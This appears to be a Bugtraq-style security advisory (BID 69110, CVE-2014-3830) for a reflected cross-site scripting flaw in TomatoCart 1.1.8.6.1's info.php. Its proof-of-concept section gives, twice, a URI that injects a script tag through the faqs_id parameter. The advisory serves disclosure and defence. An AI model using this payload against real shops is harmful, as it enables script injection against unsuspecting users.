TomatoCart 'info.php' Cross Site Scripting Vulnerability
BID:69110
Info
TomatoCart 'info.php' Cross Site Scripting Vulnerability
| Bugtraq ID: | 69110 |
| Class: | Input Validation Error |
| CVE: |
CVE-2014-3830 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 06 2014 12:00AM |
| Updated: | Aug 06 2014 12:00AM |
| Credit: | Breaking technologies |
| Vulnerable: |
TomatoCart TomatoCart 1.1.8.6.1 |
| Not Vulnerable: | |
Exploit / POC
TomatoCart 'info.php' Cross Site Scripting Vulnerability
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URI is available:
http://www,example.com/info.php?faqs&faqs_id=1';</script><script>alert('xss');</script>
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URI is available:
http://www,example.com/info.php?faqs&faqs_id=1';</script><script>alert('xss');</script>